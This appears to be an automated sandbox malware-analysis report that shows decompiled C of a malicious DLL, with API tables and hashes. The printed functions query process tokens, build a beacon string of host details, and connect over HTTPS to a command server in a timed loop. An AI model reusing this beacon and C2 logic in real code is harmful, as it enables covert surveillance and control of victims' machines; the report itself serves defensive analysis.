                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E04A41525(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E04A48B22(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                Statement addresses for the listing above: 0x04a49a1c to 0x04a49ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04A49A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04A49A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A49A85
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A49AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04A49AAF
                                • NtClose.NTDLL(?), ref: 04A49AC1
                                • NtClose.NTDLL(00000000), ref: 04A49ACB
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 90352ec196c2820b60046e9aeefeffcdbcea37852e897613f8370a379c7f145e
                                • Instruction ID: 27a6e79b1577fc2300c53e070743b158194d369fbc27f768e71680d913f25803
                                • Opcode Fuzzy Hash: 90352ec196c2820b60046e9aeefeffcdbcea37852e897613f8370a379c7f145e
                                • Instruction Fuzzy Hash: 222136B2900218BBEB019FA4DC44EDEBFBDEF88750F108022FA05E6150D7729A519BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E04A49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                				intOrPtr _v0;
                                				intOrPtr _v4;
                                				intOrPtr _v16;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				void* _v44;
                                				intOrPtr _v52;
                                				void* __edi;
                                				long _t25;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				intOrPtr _t28;
                                				intOrPtr _t29;
                                				intOrPtr _t30;
                                				void* _t33;
                                				intOrPtr _t34;
                                				int _t37;
                                				void* _t38;
                                				intOrPtr _t42;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				intOrPtr _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t68;
                                				intOrPtr _t71;
                                				intOrPtr _t74;
                                				int _t77;
                                				intOrPtr _t78;
                                				int _t81;
                                				intOrPtr _t83;
                                				int _t86;
                                				intOrPtr* _t89;
                                				intOrPtr* _t90;
                                				void* _t91;
                                				void* _t95;
                                				void* _t96;
                                				void* _t97;
                                				intOrPtr _t98;
                                				void* _t100;
                                				int _t101;
                                				void* _t102;
                                				void* _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t108;
                                
                                				_t95 = __edx;
                                				_t91 = __ecx;
                                				_t25 = __eax;
                                				_t105 = _a16;
                                				_v4 = 8;
                                				if(__eax == 0) {
                                					_t25 = GetTickCount();
                                				}
                                				_t26 =  *0x4a4d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t27 =  *0x4a4d014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t28 =  *0x4a4d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t29 = E04A4D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t30 =  *0x4a4d2a8; // 0x40a5a8
                                				_t3 = _t30 + 0x4a4e633; // 0x74666f73
                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x4a4d02c,  *0x4a4d004, _t25);
                                				_t33 = E04A43288();
                                				_t34 =  *0x4a4d2a8; // 0x40a5a8
                                				_t4 = _t34 + 0x4a4e673; // 0x74707526
                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                				_t108 = _t106 + 0x38;
                                				_t102 = _t101 + _t37; // executed
                                				_t38 = E04A4831C(_t91); // executed
                                				_t96 = _t38;
                                				if(_t96 != 0) {
                                					_t83 =  *0x4a4d2a8; // 0x40a5a8
                                					_t6 = _t83 + 0x4a4e8d4; // 0x736e6426
                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t86;
                                					HeapFree( *0x4a4d238, 0, _t96);
                                				}
                                				_t97 = E04A49267();
                                				if(_t97 != 0) {
                                					_t78 =  *0x4a4d2a8; // 0x40a5a8
                                					_t8 = _t78 + 0x4a4e8dc; // 0x6f687726
                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t81;
                                					HeapFree( *0x4a4d238, 0, _t97);
                                				}
                                				_t98 =  *0x4a4d32c; // 0x4e595b0
                                				_a32 = E04A4284E(0x4a4d00a, _t98 + 4);
                                				_t42 =  *0x4a4d2d0; // 0x0
                                				if(_t42 != 0) {
                                					_t74 =  *0x4a4d2a8; // 0x40a5a8
                                					_t11 = _t74 + 0x4a4e8b6; // 0x3d736f26
                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t77;
                                				}
                                				_t43 =  *0x4a4d2cc; // 0x0
                                				if(_t43 != 0) {
                                					_t71 =  *0x4a4d2a8; // 0x40a5a8
                                					_t13 = _t71 + 0x4a4e88d; // 0x3d706926
                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                				}
                                				if(_a32 != 0) {
                                					_t100 = RtlAllocateHeap( *0x4a4d238, 0, 0x800);
                                					if(_t100 != 0) {
                                						E04A43239(GetTickCount());
                                						_t50 =  *0x4a4d32c; // 0x4e595b0
                                						__imp__(_t50 + 0x40);
                                						asm("lock xadd [eax], ecx");
                                						_t54 =  *0x4a4d32c; // 0x4e595b0
                                						__imp__(_t54 + 0x40);
                                						_t56 =  *0x4a4d32c; // 0x4e595b0
                                						_t103 = E04A47B8D(1, _t95, _t105,  *_t56);
                                						asm("lock xadd [eax], ecx");
                                						if(_t103 != 0) {
                                							StrTrimA(_t103, 0x4a4c28c);
                                							_push(_t103);
                                							_t62 = E04A4A677();
                                							_v16 = _t62;
                                							if(_t62 != 0) {
                                								_t89 = __imp__;
                                								 *_t89(_t103, _v0);
                                								 *_t89(_t100, _a4);
                                								_t90 = __imp__;
                                								 *_t90(_t100, _v28);
                                								 *_t90(_t100, _t103);
                                								_t68 = E04A4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                								_v52 = _t68;
                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                									E04A45433();
                                								}
                                								HeapFree( *0x4a4d238, 0, _v44);
                                							}
                                							RtlFreeHeap( *0x4a4d238, 0, _t103); // executed
                                						}
                                						RtlFreeHeap( *0x4a4d238, 0, _t100); // executed
                                					}
                                					HeapFree( *0x4a4d238, 0, _a24);
                                				}
                                				RtlFreeHeap( *0x4a4d238, 0, _t105); // executed
                                				return _a4;
                                			}

                                Statement addresses for the listing above: 0x04a49bf1 to 0x04a49e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A49C08
                                • wsprintfA.USER32 ref: 04A49C55
                                • wsprintfA.USER32 ref: 04A49C72
                                • wsprintfA.USER32 ref: 04A49C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49CA5
                                • wsprintfA.USER32 ref: 04A49CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49CD7
                                • wsprintfA.USER32 ref: 04A49D0E
                                • wsprintfA.USER32 ref: 04A49D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A49D4B
                                • GetTickCount.KERNEL32 ref: 04A49D5B
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A49D6F
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A49D8D
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                  • Part of subcall function 04A47B8D: lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A47B8D: strcpy.NTDLL ref: 04A47BD7
                                  • Part of subcall function 04A47B8D: lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                • StrTrimA.SHLWAPI(00000000,04A4C28C,?,04E595B0), ref: 04A49DBF
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                  • Part of subcall function 04A4A677: lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A4A677: lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                  • Part of subcall function 04A4A677: lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 04A49DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A49DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 04A49DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04A49DF6
                                  • Part of subcall function 04A4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04A493EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04A49E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04A49E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,04E595B0), ref: 04A49E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A49E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 04A49E65
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 734f15592640f87782ee869cddbf76a21986ba8c1243f3c8bfbb39de52768753
                                • Instruction ID: 72976ce556b8ae27c6d0dde9ad90a84cfd8c70a376e6ec447201d34111c3c128
                                • Opcode Fuzzy Hash: 734f15592640f87782ee869cddbf76a21986ba8c1243f3c8bfbb39de52768753
                                • Instruction Fuzzy Hash: DB617B79500200AFE721AB74EC48E5F7BECEBD8754F050114F909DB260DB3AED169B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 83%
                                			E04A47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t60;
                                				long _t64;
                                				signed int _t65;
                                				void* _t68;
                                				void* _t70;
                                				signed int _t71;
                                				intOrPtr _t73;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t73 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x4a4d240);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L04A4AF6E();
                                					_v36.LowPart = _t46;
                                					_v32 = _t73;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x4a4d26c; // 0x2cc
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x4a4d24c = 5;
                                						} else {
                                							_t68 = E04A45319(_t73); // executed
                                							if(_t68 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x4a4d260 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t71 = _v12;
                                						_t58 = _t71 << 4;
                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                						_t72 = _t71 + 1;
                                						_v24 = _t71 + 1;
                                						_t60 = E04A42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                						_v8.LowPart = _t60;
                                						if(_t60 != 0) {
                                							goto L17;
                                						}
                                						_t65 = _v24;
                                						_v12 = _t65;
                                						_t90 = _t65 - 3;
                                						if(_t65 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E04A49870(_t72, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t60 - 0x10d2;
                                						if(_t60 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x4a4d244);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x4a4d248; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t60 = E04A45433();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x4a4d248);
                                								L21:
                                								L04A4AF6E();
                                								_v36.LowPart = _t60;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								_v8.LowPart = _t64;
                                								__eflags = _t64;
                                								if(_t64 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t70 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x4a4d238, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t70 = _t70 - 1;
                                					} while (_t70 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 04A47C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04A47C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04A47C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04A47C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A47CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A47D4E
                                • CloseHandle.KERNEL32(?), ref: 04A47D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04A47D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04A4312C,?), ref: 04A47DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04A47DB8
                                  • Part of subcall function 04A45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E59368,00000000,?,74E5F710,00000000,74E5F730), ref: 04A45368
                                  • Part of subcall function 04A45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E593A0,?,00000000,30314549,00000014,004F0053,04E5935C), ref: 04A45405
                                  • Part of subcall function 04A45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A47CCB), ref: 04A45417
                                • GetLastError.KERNEL32 ref: 04A47DCA
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: ae850c4eb15c04e82449a428d293c8cfa97759a70caa229a7e94f813c2098124
                                • Instruction ID: aa3ce20859de765350699ed5e4b8962879864fe4396c435a6a340408af1029c0
                                • Opcode Fuzzy Hash: ae850c4eb15c04e82449a428d293c8cfa97759a70caa229a7e94f813c2098124
                                • Instruction Fuzzy Hash: 41518E79901228AFEB20DF94DD449EEBFB8EFC9324F204616F415A6180D735AA41CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E04A4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
                                				_v16 = 0xea60;
                                				__imp__( *(__esi + 4));
                                				_v12 = __eax + __eax;
                                				_t56 = E04A41525(__eax + __eax + 1);
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E04A48B22(_t56);
                                					} else {
                                						E04A48B22( *(__esi + 4));
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
                                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                				 *(_t65 + 0x10) = _t34;
                                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04A4A7F1) == 0xffffffff) {
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
                                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
                                					 *(_t65 + 0x14) = _t38;
                                					if(_t38 != 0 || GetLastError() == 0x3e5 && E04A429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                						_t59 =  *0x4a4d2a8; // 0x40a5a8
                                						_t15 = _t59 + 0x4a4e743; // 0x544547
                                						_v8 = 0x84c03180;
                                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
                                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                							_v8 = _v8 | 0x00000100;
                                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                						}
                                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04A4A86E
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04A4A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04A4A8B9
                                • InternetSetStatusCallback.WININET(00000000,04A4A7F1), ref: 04A4A8D0
                                • ResetEvent.KERNEL32(?), ref: 04A4A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 04A4A8F8
                                • GetLastError.KERNEL32 ref: 04A4A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 04A4A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04A4A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04A4A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04A4A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04A4A9A6
                                • GetLastError.KERNEL32 ref: 04A4A9B0
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 232dfd5686f9a147e723d44bb98b61370365934568d9c9456b29e46f7c51fd32
                                • Instruction ID: 447d67ae59106a4eef5254117fd14673ae5eac8b5c483ab028c72623068be1e1
                                • Opcode Fuzzy Hash: 232dfd5686f9a147e723d44bb98b61370365934568d9c9456b29e46f7c51fd32
                                • Instruction Fuzzy Hash: 7F418D76540204BFEB319FA5DC88E9F7ABDEBD9700F104928F542D1191E775A945CA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 51%
                                			E04A4AC95(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0x4a40000;
                                				_t115 = _t139[3] + 0x4a40000;
                                				_t131 = _t139[4] + 0x4a40000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0x4a40000;
                                				_v16 = _t139[5] + 0x4a40000;
                                				_v64 = _a8;
                                				_v72 = 0x24;
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					/* descriptor lacks the RVA-attribute bit: 0xC06D0057 is VcppException(ERROR_INVALID_PARAMETER) */
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0x4a40002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
                                				_t82 =  *0x4a4d1a0; // 0x0
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0x4a4d1a0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0x4a4d1a0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								/* resolve by name or by ordinal (_v56 == 0 marks an ordinal import); on failure 0xC06D007F (ERROR_PROC_NOT_FOUND) is raised below */
								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
                                									_t90 =  *0x4a4d19c; // 0x0
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
                                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0x4a4d1a0; // 0x0
                                					if(_t98 == 0) {
						L9:
						/* load the delay-imported module by name; on failure 0xC06D007E (ERROR_MOD_NOT_FOUND) is raised at L12 */
						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
                                							L13:
                                							if(InterlockedExchange(_v28, _t138) == _t138) {
                                								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0x4a4d198; // 0x0
                                										 *_t102 = _t125;
                                										 *0x4a4d198 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0x4a4d19c; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
                                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
			}

Instruction addresses 0x04a4aca4-0x04a4aec7 (the per-statement address column shown beside the decompiled code in the original view).

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04A4AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 04A4AD8B
                                • GetLastError.KERNEL32 ref: 04A4AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04A4ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
